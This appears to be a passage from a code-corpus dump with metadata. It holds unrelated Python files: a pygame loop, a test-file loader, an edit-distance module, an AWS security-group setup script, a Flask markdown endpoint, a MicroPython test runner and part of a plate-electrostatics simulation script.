B.disp(screen)
shot.disp(screen)
display.flip()
clock.tick(60)
| none | 1 | 3.089789 | 3 | |
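Note: despite the directory name, the game loop above never actually checks whether the police sprite has caught the car, and the gameover object it creates is never drawn. A hedged sketch of how that check could be added inside the loop, using only objects already defined in the script (pygame's Rect.colliderect does the overlap test):
# Illustrative only -- not part of the original script.
if B.rect.colliderect(S.rect):   # axis-aligned overlap between police and car rects
    g.disp(screen)               # draw the gameover sprite
    display.flip()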
baygon/description.py | heig-tin-info/baygon | 1 | 6616738 | """
Read and validate test file.
"""
import yaml
import json
import os
from collections.abc import Sequence
from . import schema, Executable
def check_executable(executable: Executable, filters=None):
if executable and not isinstance(executable, Executable):
raise AttributeError('Not an instance of Executable')
if executable and filters:
executable.filters = filters
return executable
def find_testfile(path=None):
"""Recursively find the tests description file."""
if not path:
path = os.path.dirname(os.path.realpath('.'))
if not os.path.isdir(path):
raise ValueError(f"Path name '{path}' is not a directory")
for filename in ['baygon', 't', 'test', 'tests']:
for ext in ['json', 'yml', 'yaml']:
f = os.path.join(path, f"{filename}.{ext}")
if os.path.exists(f):
return f
# Recursively search in parent directories
if os.path.dirname(path) != path: # Test if root directory
return find_testfile(os.path.dirname(path))
def load(filename):
"""Load a configuration file (can be YAML or JSON)."""
def loadYaml(filename):
with open(filename) as fp:
return yaml.load(fp, Loader=yaml.FullLoader)
def loadJson(filename):
with open(filename) as fp:
return json.load(fp)
extension = os.path.splitext(filename)[1]
if extension in ['.yml', '.yaml']:
return loadYaml(filename)
if extension in ['.json']:
return loadJson(filename)
raise ValueError(f'Unknown extension: {extension}')
class WithId:
@property
def id(self):
return '.'.join(map(str, self._id))
def _get_id(self, *k: int):
return list(self._id) + list(k)
class TestSequence(Sequence):
def __len__(self):
return len(self._tests)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self._tests) + ')'
def __getitem__(self, item):
return self._tests[item]
class Test(dict, WithId):
""" Functional test descriptior. """
def __init__(self, *args, executable: Executable = None, id=[], skip=False):
super(Test, self).__init__(*args)
self.__dict__ = self
self._id = id
self._skip = skip
self.executable = check_executable(executable)
def __repr__(self):
return self.__class__.__name__ + '(' + super().__repr__() + ')'
class Group(TestSequence, WithId):
""" Group of functional tests optionally identified by a name. """
def __init__(self, tests, name: str = '', executable: Executable = None,
id: list = [], skip=False):
self._tests = tests
self.name = name
self.executable = check_executable(executable)
self._skip = skip
self._id = id
class Tests(TestSequence, WithId):
_group_class = Group
_unit_class = Test
def __init__(self, data=None, path=None, executable: Executable = None,
id=[], skip=False):
if not isinstance(data, dict):
data = self._load(path)
data = schema.schema(data) # Validate
tests = data.pop('tests')
self.__dict__ = data
self.filename = path
self.executable = check_executable(executable, self.filters)
self._id = id
self._skip = skip
self._tests = list(self._build(tests, self._id, self.executable))
def _load(self, path=None):
if not path:
path = os.path.realpath('.')
if path and not os.path.isfile(path):
old_path = path
path = find_testfile(path)
if not path:
raise(ValueError(
f"Couldn't find and configuration file in '{old_path}'"))
return load(path)
def _build(self, tests, id=[], executable=None, skip=False):
for index, test in enumerate(tests, start=1):
new_id = id + [index]
kwargs = {'id': new_id, 'skip': skip, 'executable': executable}
if 'executable' in test and test['executable'] is not None:
if os.path.isfile(test['executable']):
kwargs['executable'] = Executable(test['executable'])
else:
kwargs['skip'] = True
if 'tests' in test:
yield self._group_class(
list(self._build(test['tests'], **kwargs)),
name=test['name'], **kwargs)
else:
yield self._unit_class(test, **kwargs)
| """
Read and validate test file.
"""
import yaml
import json
import os
from collections.abc import Sequence
from . import schema, Executable
def check_executable(executable: Executable, filters=None):
if executable and not isinstance(executable, Executable):
raise AttributeError('Not an instance of Executable')
if executable and filters:
executable.filters = filters
return executable
def find_testfile(path=None):
"""Recursively find the tests description file."""
if not path:
path = os.path.dirname(os.path.realpath('.'))
if not os.path.isdir(path):
raise ValueError(f"Path name '{path}' is not a directory")
for filename in ['baygon', 't', 'test', 'tests']:
for ext in ['json', 'yml', 'yaml']:
f = os.path.join(path, f"{filename}.{ext}")
if os.path.exists(f):
return f
# Recursively search in parent directories
if os.path.dirname(path) != path: # Test if root directory
return find_testfile(os.path.dirname(path))
def load(filename):
"""Load a configuration file (can be YAML or JSON)."""
def loadYaml(filename):
with open(filename) as fp:
return yaml.load(fp, Loader=yaml.FullLoader)
def loadJson(filename):
with open(filename) as fp:
return json.load(fp)
extension = os.path.splitext(filename)[1]
if extension in ['.yml', '.yaml']:
return loadYaml(filename)
if extension in ['.json']:
return loadJson(filename)
raise ValueError(f'Unknown extension: {extension}')
class WithId:
@property
def id(self):
return '.'.join(map(str, self._id))
def _get_id(self, *k: int):
return list(self._id) + list(k)
class TestSequence(Sequence):
def __len__(self):
return len(self._tests)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self._tests) + ')'
def __getitem__(self, item):
return self._tests[item]
class Test(dict, WithId):
""" Functional test descriptior. """
def __init__(self, *args, executable: Executable = None, id=[], skip=False):
super(Test, self).__init__(*args)
self.__dict__ = self
self._id = id
self._skip = skip
self.executable = check_executable(executable)
def __repr__(self):
return self.__class__.__name__ + '(' + super().__repr__() + ')'
class Group(TestSequence, WithId):
""" Group of functional tests optionally identified by a name. """
def __init__(self, tests, name: str = '', executable: Executable = None,
id: list = [], skip=False):
self._tests = tests
self.name = name
self.executable = check_executable(executable)
self._skip = skip
self._id = id
class Tests(TestSequence, WithId):
_group_class = Group
_unit_class = Test
def __init__(self, data=None, path=None, executable: Executable = None,
id=[], skip=False):
if not isinstance(data, dict):
data = self._load(path)
data = schema.schema(data) # Validate
tests = data.pop('tests')
self.__dict__ = data
self.filename = path
self.executable = check_executable(executable, self.filters)
self._id = id
self._skip = skip
self._tests = list(self._build(tests, self._id, self.executable))
def _load(self, path=None):
if not path:
path = os.path.realpath('.')
if path and not os.path.isfile(path):
old_path = path
path = find_testfile(path)
if not path:
raise(ValueError(
f"Couldn't find and configuration file in '{old_path}'"))
return load(path)
def _build(self, tests, id=[], executable=None, skip=False):
for index, test in enumerate(tests, start=1):
new_id = id + [index]
kwargs = {'id': new_id, 'skip': skip, 'executable': executable}
if 'executable' in test and test['executable'] is not None:
if os.path.isfile(test['executable']):
kwargs['executable'] = Executable(test['executable'])
else:
kwargs['skip'] = True
if 'tests' in test:
yield self._group_class(
list(self._build(test['tests'], **kwargs)),
name=test['name'], **kwargs)
else:
yield self._unit_class(test, **kwargs)
| en | 0.679298 | Read and validate test file. Recursively find the tests description file. # Recursively search in parent directories # Test if root directory Load a configuration file (can be YAML or JSON). Functional test descriptor. Group of functional tests optionally identified by a name. # Validate | 2.747891 | 3 |
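For context, a minimal sketch of the tests description data that find_testfile()/Tests() above would consume. Only the structural keys this module itself reads (tests, name, executable) are shown; the per-test assertion keys are defined by baygon's schema module and are omitted here.
# Hypothetical minimal content of a baygon.json / baygon.yml file (illustrative only).
minimal_config = {
    "tests": [
        {
            "name": "smoke tests",        # entries with a nested "tests" list become a Group
            "executable": "./build/app",  # optional; the group is skipped if the file is missing
            "tests": [
                {}                        # a leaf Test; real assertion keys come from schema.py
            ],
        }
    ]
}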
src/stringology/ed.py | luismsgomes/stringology | 1 | 6616739 | <reponame>luismsgomes/stringology<gh_stars>1-10
def ed(s1, s2):
'''edit distance
>>> ed('', ''), ed('a', 'a'), ed('','a'), ed('a', ''), ed('a!a', 'a.a')
(0, 0, 1, 1, 1)
This implementation takes only O(min(|s1|,|s2|)) space.
'''
m, n = len(s1), len(s2)
if m < n:
m, n = n, m # ensure n <= m, to use O(min(n,m)) space
s1, s2 = s2, s1
d = list(range(n+1))
for i in range(m):
p = i
d[0] = i+1
for j in range(n):
t = 0 if s1[i] == s2[j] else 1
p, d[j+1] = d[j+1], min(p+t, d[j]+1, d[j+1]+1)
return d[n]
def ned(s1, s2):
return ed(s1, s2) / max(1, len(s1), len(s2))
def edsim(s1, s2):
return 1.0 - ned(s1, s2)
| def ed(s1, s2):
'''edit distance
>>> ed('', ''), ed('a', 'a'), ed('','a'), ed('a', ''), ed('a!a', 'a.a')
(0, 0, 1, 1, 1)
This implementation takes only O(min(|s1|,|s2|)) space.
'''
m, n = len(s1), len(s2)
if m < n:
m, n = n, m # ensure n <= m, to use O(min(n,m)) space
s1, s2 = s2, s1
d = list(range(n+1))
for i in range(m):
p = i
d[0] = i+1
for j in range(n):
t = 0 if s1[i] == s2[j] else 1
p, d[j+1] = d[j+1], min(p+t, d[j]+1, d[j+1]+1)
return d[n]
def ned(s1, s2):
return ed(s1, s2) / max(1, len(s1), len(s2))
def edsim(s1, s2):
return 1.0 - ned(s1, s2) | en | 0.315355 | edit distance >>> ed('', ''), ed('a', 'a'), ed('','a'), ed('a', ''), ed('a!a', 'a.a') (0, 0, 1, 1, 1) This implementation takes only O(min(|s1|,|s2|)) space. # ensure n <= m, to use O(min(n,m)) space | 3.203865 | 3 |
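A small usage sketch for the three functions above; the import path is assumed from the file name, and the expected values follow directly from the definitions of ed, ned and edsim.
from stringology.ed import ed, ned, edsim   # module path assumed from src/stringology/ed.py

print(ed("kitten", "sitting"))    # 3  (substitute k->s, e->i, insert g)
print(ned("kitten", "sitting"))   # 3 / 7 ~= 0.4286, normalized by the longer string
print(edsim("kitten", "sitting")) # 1 - 3/7 ~= 0.5714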
cloud_deployer/aws_handlers/security_group.py | abualy/cloud-deployer | 1 | 6616740 | #!/usr/bin/env python
#import modules
import csv
import time
#Create security group rules within all listed security groups
def sg_create(awsc, my_csv, archi, tags=None):
#open csv file and read each row as dictionary
sg_file = open(my_csv, 'rb')
sg_reader = csv.DictReader(sg_file)
print "########################## Starting security groups creation ###############################"
if 'sg' not in archi:
archi['sg'] = {}
#iterate through rows checking for rules
for sg_dict in sg_reader:
#if security group not created, then create it first
if sg_dict['security_group'] not in archi['sg']:
sg = awsc.create_security_group(name=sg_dict['security_group'], description=sg_dict['sg_description'], vpc_id=archi['vpc'][sg_dict['vpc']], dry_run=False)
time.sleep(3)
sg.add_tag("Name", sg_dict['security_group'])
sg.add_tag("Group", sg_dict['vpc'])
sg.add_tags(tags)
print ">> >> " + sg_dict['security_group'] + " created"
archi['sg'][sg_dict['security_group']] = sg.id
rule = awsc.revoke_security_group_egress(group_id=sg.id, ip_protocol="-1", from_port=-1, to_port=-1, cidr_ip="0.0.0.0/0", dry_run=False)
print sg_dict['security_group'] + " egress closing state: " + str(rule)
if sg_dict['tcp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['udp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['icmp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
print "done creating security groups :) "
return archi
| #!/usr/bin/env python
#import modules
import csv
import time
#Create security group rules within all listed security groups
def sg_create(awsc, my_csv, archi, tags=None):
#open csv file and read each row as dictionary
sg_file = open(my_csv, 'rb')
sg_reader = csv.DictReader(sg_file)
print "########################## Starting security groups creation ###############################"
if 'sg' not in archi:
archi['sg'] = {}
#iterate through rows checking for rules
for sg_dict in sg_reader:
#if security group not created, then create it first
if sg_dict['security_group'] not in archi['sg']:
sg = awsc.create_security_group(name=sg_dict['security_group'], description=sg_dict['sg_description'], vpc_id=archi['vpc'][sg_dict['vpc']], dry_run=False)
time.sleep(3)
sg.add_tag("Name", sg_dict['security_group'])
sg.add_tag("Group", sg_dict['vpc'])
sg.add_tags(tags)
print ">> >> " + sg_dict['security_group'] + " created"
archi['sg'][sg_dict['security_group']] = sg.id
rule = awsc.revoke_security_group_egress(group_id=sg.id, ip_protocol="-1", from_port=-1, to_port=-1, cidr_ip="0.0.0.0/0", dry_run=False)
print sg_dict['security_group'] + " egress closing state: " + str(rule)
if sg_dict['tcp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='tcp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'tcp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['udp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='udp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'udp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
if sg_dict['icmp']=='*':
if sg_dict['ingress/egress']=='ingress':
rule = awsc.authorize_security_group(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " ingress opening state: " + str(rule)
if sg_dict['ingress/egress']=='egress':
rule = awsc.authorize_security_group_egress(group_id=archi['sg'][sg_dict['security_group']], ip_protocol='icmp', from_port=sg_dict['from'], to_port=sg_dict['to'], cidr_ip=sg_dict['cidr'], dry_run=False)
print 'icmp' +" from: "+ sg_dict['from'] +" to: " + sg_dict['to'] + " for: " + sg_dict['cidr'] + " egress opening state: " + str(rule)
print "done creating security groups :) "
return archi
| en | 0.598224 | #!/usr/bin/env python #import modules #Create security group rules within all listed security groups #open csv file and read each row as dictionary ######################### Starting security groups creation ###############################" #iterate through rows checking for rules #if security group not created, then create it first | 2.781606 | 3 |
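For reference, a sketch of the CSV layout sg_create() above expects. The column names are taken directly from the sg_dict[...] keys the function reads; the example values are made up.
# Hypothetical rules file passed as my_csv (values illustrative only).
example_rules_csv = """security_group,sg_description,vpc,ingress/egress,tcp,udp,icmp,from,to,cidr
web-sg,web servers,prod-vpc,ingress,*,,,80,80,0.0.0.0/0
web-sg,web servers,prod-vpc,egress,*,,,443,443,0.0.0.0/0
"""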
moto/ds/utils.py | richford/moto | 2 | 6616741 | <reponame>richford/moto
"""Pagination control model for DirectoryService."""
PAGINATION_MODEL = {
"describe_directories": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 100, # This should be the sum of the directory limits
"page_ending_range_keys": ["directory_id"],
},
"list_tags_for_resource": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 50,
"page_ending_range_keys": ["Key"],
},
}
| """Pagination control model for DirectoryService."""
PAGINATION_MODEL = {
"describe_directories": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 100, # This should be the sum of the directory limits
"page_ending_range_keys": ["directory_id"],
},
"list_tags_for_resource": {
"input_token": "next_token",
"limit_key": "limit",
"limit_default": 50,
"page_ending_range_keys": ["Key"],
},
} | en | 0.833406 | Pagination control model for DirectoryService. # This should be the sum of the directory limits | 1.934679 | 2 |
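A simplified, stand-alone illustration of how a limit/next_token model like the one above drives pagination. This is not moto's actual paginator implementation; the helper below is hypothetical.
def paginate_list(items, model_entry, limit=None, next_token=None):
    """Return one page of items plus the token for the next page (illustrative only)."""
    limit = limit or model_entry["limit_default"]           # e.g. 100 for describe_directories
    start = int(next_token) if next_token else 0
    page = items[start:start + limit]
    new_token = str(start + limit) if start + limit < len(items) else None
    return page, new_token

# page, token = paginate_list(all_directories, PAGINATION_MODEL["describe_directories"])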
lesson_builder/config.py | tud-python-courses/lesson-builder | 0 | 6616742 | <filename>lesson_builder/config.py
import logging
import os
__author__ = '<NAME>'
__version__ = '0.1'
DEBUG = True
CONFIG_NAME = 'build_conf.json'
BUILD_TIMEOUT = 2 * 60 # seconds
BASE_DIRECTORY = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
logging.basicConfig(
format='%(levelname)-10s %(asctime)-15s [%(name)s] :: %(message)s',
filename=os.path.join(BASE_DIRECTORY, 'builder.log'),
level=logging.DEBUG if DEBUG else logging.INFO
)
ERROR_LOG_FILE = 'builder-error.log'
INFO_LOG_FILE = 'builder.log' | <filename>lesson_builder/config.py
import logging
import os
__author__ = '<NAME>'
__version__ = '0.1'
DEBUG = True
CONFIG_NAME = 'build_conf.json'
BUILD_TIMEOUT = 2 * 60 # seconds
BASE_DIRECTORY = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
logging.basicConfig(
format='%(levelname)-10s %(asctime)-15s [%(name)s] :: %(message)s',
filename=os.path.join(BASE_DIRECTORY, 'builder.log'),
level=logging.DEBUG if DEBUG else logging.INFO
)
ERROR_LOG_FILE = 'builder-error.log'
INFO_LOG_FILE = 'builder.log' | none | 1 | 2.15135 | 2 | |
app/api/tools.py | YaPunk/bokunosite | 0 | 6616743 | <reponame>YaPunk/bokunosite
from flask import jsonify, request
from markdown2 import markdown
from app import config
from app.api import api
from app.api.errors import bad_request
@api.route('/markdown', methods=['POST'])
def markdown_render():
data = request.get_json()['data']
if len(data) > 50000:
return bad_request()
else:
return jsonify({
"html": markdown(data, extras=config['MARKDOWN_EXTRAS'])
})
| from flask import jsonify, request
from markdown2 import markdown
from app import config
from app.api import api
from app.api.errors import bad_request
@api.route('/markdown', methods=['POST'])
def markdown_render():
data = request.get_json()['data']
if len(data) > 50000:
return bad_request()
else:
return jsonify({
"html": markdown(data, extras=config['MARKDOWN_EXTRAS'])
}) | none | 1 | 2.550071 | 3 | |
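A minimal client-side sketch for exercising the endpoint above. The host, port and any blueprint URL prefix are assumptions; only the 'data' payload key, the 50000-character limit and the 'html' response field come from the handler itself.
import requests  # third-party HTTP client, assumed available

resp = requests.post(
    "http://localhost:5000/markdown",                  # URL prefix of the api blueprint is an assumption
    json={"data": "# Hello\n\nSome *markdown* text."},
)
print(resp.status_code)        # 400 via bad_request() if 'data' exceeds 50000 characters
print(resp.json()["html"])     # HTML rendered by markdown2 with the configured extras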
micropython/sd/Test.py | webbhm/PiRock | 0 | 6616744 | <filename>micropython/sd/Test.py
"""
The purpose of this code is to call the test functions of the high level modules for a quick check that all is working correctly
Author: <NAME>
Date: 11/13/2020
"""
def test():
# High level test
import LogSensors
LogSensors.test()
# parameter files do not have their own test
def conf_test():
# Dump the configuration parameters
print("\nconf.py test")
try:
import conf
print("SSID", conf.SSID)
print("PWD", conf.PWD)
print("START_TIME", conf.START_TIME)
print("SAMPLE_MIN", conf.SAMPLE_MIN)
print("conf test: PASS")
except Exception as e:
# Print error in RED
print("/033[1;31;40m ERROR: Failed conf test - ", str(e))
def env_test():
print("\n env test")
try:
import env
print(env)
print("env test: PASS")
except Exception as e:
print("ERROR: Failed env test - ", str(e))
def detail_test():
# most modules have their own test
print("\n Test configuration files")
conf_test()
env_test()
print("\n Test sensors")
import BME280
BME280.test()
    import Turbidity
Turbidity.test()
import EC
EC.test()
print("\n High level functions")
test()
| <filename>micropython/sd/Test.py
"""
The purpose of this code is to call the test functions of the high level modules for a quick check that all is working correctly
Author: <NAME>
Date: 11/13/2020
"""
def test():
# High level test
import LogSensors
LogSensors.test()
# parameter files do not have their own test
def conf_test():
# Dump the configuration parameters
print("\nconf.py test")
try:
import conf
print("SSID", conf.SSID)
print("PWD", conf.PWD)
print("START_TIME", conf.START_TIME)
print("SAMPLE_MIN", conf.SAMPLE_MIN)
print("conf test: PASS")
except Exception as e:
# Print error in RED
print("/033[1;31;40m ERROR: Failed conf test - ", str(e))
def env_test():
print("\n env test")
try:
import env
print(env)
print("env test: PASS")
except Exception as e:
print("ERROR: Failed env test - ", str(e))
def detail_test():
# most modules have their own test
print("\n Test configuration files")
conf_test()
env_test()
print("\n Test sensors")
import BME280
BME280.test()
    import Turbidity
Turbidity.test()
import EC
EC.test()
print("\n High level functions")
test()
| en | 0.781746 | The purpose of this code is to call the test functions of the high level modules for a quick check that all is working correctly Author: <NAME> Date: 11/13/2020 # High level test # parameter files do not have their own test # Dump the configuration parameters # Print error in RED # most modules have their own test | 2.657339 | 3 |
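Typical use once the files are copied onto the MicroPython board (module names match the on-device imports above):
import Test
Test.test()          # quick high-level check through LogSensors
Test.detail_test()   # exercises conf/env files and each sensor driver in turn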
src/fvm/test/COUPLING/frogleg_plate.py | drm42/fvm-drm | 0 | 6616745 | #!/usr/bin/env python
### this script solves frogleg pull-in by coupling
### plate model and electrostatics via IBM
### import modules ###
import pdb
import sys
import os
from math import *
sys.setdlopenflags(0x100|0x2)
#import tecplotExporter
import fvm.fvmbaseExt as fvmbaseExt
import fvm.importers as importers
import fvm.models_atyped_double as models
import fvm.exporters_atyped_double as exporters
from FluentCase import FluentCase
from fvm.fvmbaseExt import VecD3
from mpi4py import MPI
import time
def checkMarking(n):
cells = fluidMeshes[0].getCells()
nCells = cells.getCount()
cellCoords = geomFields.coordinate[cells].asNumPyArray()
fluidFile = open(fileBase + "fluidCells_" + str(n) + ".dat", "w")
solidFile = open(fileBase + "solidCells_" + str(n) + ".dat", "w")
IBFile = open(fileBase + "IBCells_" + str(n) + ".dat", "w")
cellIBType = geomFields.ibType[cells].asNumPyArray()
for c in range (0, nCells):
ibtype = cellIBType[c]
if ibtype == -1:
fluidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -2:
IBFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -3:
solidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -5:
print ("%i\t%i\t%e\t%e\n" % (c,ibtype, cellCoords[c][0], cellCoords[c][1]))
fluidFile.close()
solidFile.close()
IBFile.close()
def writeProbeData():
deformation = plateFields.deformation[solidMeshes[0].getCells()].asNumPyArray()
maxDef = deformation.min(axis = 0)
probeFile.write('%e\t%e\t%e\n' % (globalTime, deformation[probeIndex][2], maxDef[2]))
probeFile.flush()
def saveVTK(n):
writer = exporters.VTKWriterA(geomFields,fluidMeshes,
fileBase + "elecfield-" + str(n) + ".vtk",
"frogleg",
False,0)
writer.init()
writer.writeScalarField(elecFields.potential,"potential")
writer.writeVectorField(elecFields.electric_field,"potentialgradient")
writer.finish()
writer1 = exporters.VTKWriterA(geomFields,solidMeshes,
fileBase + "deformation-" + str(n) + ".vtk",
"frogleg",
False,0)
writer1.init()
writer1.writeVectorField(plateFields.deformation,"deformation")
writer1.finish()
### ========================== properties and parameters ===============================###
### beam
rho = 8912 # density kg/m^3
E = 200e9 # Young's modulus
nu = 0.31 # Poisson's ratio
### electric field
applied_voltage = -100
dielectric_constant = 1.0
beam_thickness = 3e-6
### mesh id
fluidTop = 7
fluidBot = [9,3]
fluidSide = 8
left_electrode = 4
right_electrode = 5
central_electrode = 6
beam = [3]
anchors = [4, 5, 6, 7]
numTimeSteps = 1
globalTime = 0
globalCount = 0
timeStep = 5e-8
saveFrequency = 50
initialTransient = False
probeIndex = 50
### ===================== mesh read ===============================================###
fileBase = "./"
### 2D plate mesh
beamReader = FluentCase(sys.argv[2])
beamReader.read();
solidMeshes = beamReader.getMeshList()
geomFields = models.GeomFields('geom')
solidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidMeshes)
solidMetricsCalculator.init()
### 3D fluid mesh
fluidReader = FluentCase(sys.argv[1])
fluidReader.read();
fluidMeshes = fluidReader.getMeshList()
fluidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,fluidMeshes)
fluidMetricsCalculator.init()
nodes = fluidMeshes[0].getNodes()
xn = fluidMeshes[0].getNodeCoordinates().asNumPyArray()
for n in range(0, nodes.getCount()):
x = xn[n][0]
y = xn[n][1]
xn[n][0] = -y
xn[n][1] = x
fluidMetricsCalculator.init()
### generate solid boundary mesh
solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
solidBoundaryMetricsCalculator.init()
### find device center
cells = solidMeshes[0].getCells()
xc = geomFields.coordinate[cells].asNumPyArray()
small = 100
probeIndex = 0
for c in range(0, cells.getCount()):
rsqr = xc[c][0]*xc[c][0] + xc[c][1]*xc[c][1]
if rsqr < small:
small = rsqr
probeIndex = c
### output files
probeFile = open(fileBase + "centerDisplacement.dat", "w")
### =============================== models =====================================###
### Plate Model and boundary conditions ###
plateFields = models.PlateFields('plate')
pmodel = models.PlateModelA(geomFields,plateFields,solidMeshes)
dmodel = models.PlateDeformationModelA(geomFields,plateFields,solidMeshes)
bcMap = pmodel.getBCMap()
for id in anchors:
bc = bcMap[id]
bc.bcType = 'Clamped'
bc['specifiedXRotation']=0
bc['specifiedYRotation']=0.
bc['specifiedZDeformation']=0.
for id in beam:
bc = bcMap[id]
bc.bcType = 'SpecifiedTraction'
vcMap = pmodel.getVCMap()
for i,vc in vcMap.iteritems():
vc['density'] = rho
vc['ym'] = E
vc['nu'] = nu
### electric model and boundary condition ###
elecFields = models.ElectricFields('elec')
emodel = models.ElectricModelA(geomFields,elecFields,fluidMeshes)
bcMap = emodel.getBCMap()
bc = bcMap[central_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = applied_voltage
bc = bcMap[left_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[right_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[fluidTop]
bc.bcType = "Symmetry"
for i in fluidBot:
bc = bcMap[i]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
for i in [fluidSide]:
bc = bcMap[i]
bc.bcType = "Symmetry"
vcMap = emodel.getVCMap()
for i,vc in vcMap.iteritems():
vc.vcType = "dielectric"
vc['dielectric_constant'] = dielectric_constant
### ================================= solvers ===================================###
### plate solver ###
pc = fvmbaseExt.AMG()
pc.verbosity=0
defSolver = fvmbaseExt.BCGStab()
defSolver.preconditioner = pc
defSolver.relativeTolerance = 1e-9
defSolver.absoluteTolerance = 1.e-30
defSolver.nMaxIterations = 50000
defSolver.verbosity=0
poptions = pmodel.getOptions()
poptions.deformationLinearSolver = defSolver
poptions.deformationTolerance=1.0e-3
poptions.setVar("deformationURF",1.0)
poptions.printNormalizedResiduals=True
poptions.timeDiscretizationOrder = 2
poptions.transient=True
poptions.scf = 5./6.
poptions.setVar('timeStep',timeStep)
### elec solver ###
epc = fvmbaseExt.AMG()
epc.verbosity=0
elecSolver = fvmbaseExt.BCGStab()
elecSolver.preconditioner = epc
elecSolver.relativeTolerance = 1e-3
elecSolver.nMaxIterations = 1000
elecSolver.maxCoarseLevels=20
elecSolver.verbosity=0
eoptions = emodel.getOptions()
eoptions.electrostaticsLinearSolver = elecSolver
eoptions.electrostaticsTolerance = 0.5e-5
eoptions.electrostatics_enable = 1
eoptions.chargetransport_enable = 0
eoptions.tunneling = 0
eoptions.ibm_enable = 1
eoptions.transient_enable = False
eoptions.printNormalizedResiduals = True
### initialize models and run ###
pmodel.init()
emodel.init()
dmodel.init()
ibManager = fvmbaseExt.IBManager(geomFields,
